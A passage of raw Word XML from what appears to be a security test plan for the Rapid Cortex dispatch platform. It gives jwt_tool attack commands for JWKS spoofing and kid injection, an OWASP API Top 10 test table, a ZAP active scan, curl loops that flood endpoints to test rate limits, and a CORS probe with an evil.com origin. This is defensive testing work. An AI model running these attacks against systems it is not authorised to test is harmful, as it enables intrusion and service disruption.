      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {token} -X s    # JWKS spoofing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {token} -X k    # key injection via kid header</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {token} -T      # tamper mode — edit claims</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Race Condition Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Use Burp Suite Turbo Intruder to send parallel requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test: two dispatchers submit write-back for the same incident simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Expected: only one succeeds, second gets a clear error</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Test: two users request Ring OAuth at the same millisecond</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Expected: saveOAuthState upsert handles this cleanly — no conflict</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Test: QR code scan count increment under 100 concurrent scans</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Expected: DDB atomic ADD operation — final count exactly 100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual Code Review Focus Areas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Any code that constructs a string and passes it to exec(), eval(), or shell</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Any custom serialization/deserialization logic</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Any place where user input influences a DynamoDB key or filter expression</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Any auth check that uses OR instead of AND logic</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Any try/catch that silently swallows security-relevant exceptions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Any place where a default value could grant broader access than intended</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</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CAP XML parser handles billion laughs attack without crashing (CPU/memory limit enforced)</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ULID generation is not predictable from external observation</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Race condition on write-back approval produces exactly one approved record</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JWT attack vector (none, alg confusion, kid injection) bypasses auth</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FIPS code manipulation routes a CAP alert to an unintended agency</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Phase 8 — API Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid Cortex is an API-first platform. Every capability is exposed through REST APIs consumed by the web app, desktop app, and external integrations. This phase validates all API endpoints against OWASP API Security Top 10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP API Security Top 10 — Rapid Cortex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3240"/>
        <w:gridCol w:w="5760"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576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RC Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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API1: BOLA</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Broken Object Level Authorization — access another user's resource by changing an ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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Request incidents, agencies, billing with swapped agencyId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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API2: Broken Authentication</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Weak auth mechanisms, token issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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JWT attacks, Cognito user enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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API3: BOPLA</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Broken Object Property Level Auth — mass assignment via request body</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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Include privileged fields (role, agencyId) in PUT request body</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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API4: Unrestricted Resource Consumption</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Rate limiting absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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High-volume requests to CAP ingest, report endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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API5: BFLA</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Broken Function Level Authorization — dispatcher calling admin endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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Use dispatcher JWT against supervisor/admin routes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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API6: Unrestricted Access to Sensitive Business Flows</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Abuse business logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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Auto-approve write-backs, bulk-create QR codes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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API7: Server Side Request Forgery</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Server fetches attacker-controlled URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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Inject URLs in webhook config, CAD API URL fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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API8: Security Misconfiguration</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CORS, headers, exposed debug info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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Check all CORS headers, X-Powered-By, stack traces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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API9: Improper Inventory Management</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Old API versions still accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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Test /v0/, /v1/, /internal/, /debug/ paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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API10: Unsafe Consumption of APIs</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Trusting upstream data without validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="57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Inject malicious data via Ring webhook, CAD webhook</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing Tool: OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Run ZAP in daemon mode against staging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">zap.sh -daemon -port 8090 -config api.addrs.addr.name=.* -config api.addrs.addr.enabled=true</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Authenticated active scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">zap-cli --zap-url http://localhost:8090 active-scan \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  --scanners all \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  --context-name rc-staging \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  https://api-staging.rapidcortex.us/api</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Rate Limiting Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test rate limit on public CAP ingest endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">for i in {1..200}; do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  curl -s -o /dev/null -w '%{http_code}\n' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    -X POST https://api.rapidcortex.us/api/cad/cap/ingest/test-agency \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    -H 'Content-Type: application/xml' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    -d '&lt;alert&gt;test&lt;/alert&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">done | sort | uniq -c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Expect: 429 responses after the rate limit is hit</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Test rate limit on QR report endpoint (public, no auth)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">for i in {1..500}; do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  curl -s -o /dev/null -w '%{http_code}\n' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    https://app.rapidcortex.us/report/TESTQRID;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">done | sort | uniq -c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test for overly permissive CORS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I -X OPTIONS https://api.rapidcortex.us/api/incidents \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H 'Origin: https://evil.com' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H 'Access-Control-Request-Method: GET'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Expected: NO Access-Control-Allow-Origin: * or evil.com in response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Allowed origins should only be app.rapidcortex.us and known domains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</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All nine RBAC roles isolated — no cross-role endpoint access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BOLA: agencyId from JWT, not request body — cross-agency requests return 403</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Rate limiting active on public endpoints (CAP ingest, QR report)</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CORS restricted to known Rapid Cortex domains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stack traces or internal paths in error responses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/v0/, /debug/, or /internal/ paths accessible</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Phase 9 — Cloud Infrastructure Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid Cortex runs entirely on AWS. This phase validates IAM policies, S3 bucket configurations, Lambda security, Cognito hardening, and DynamoDB access controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
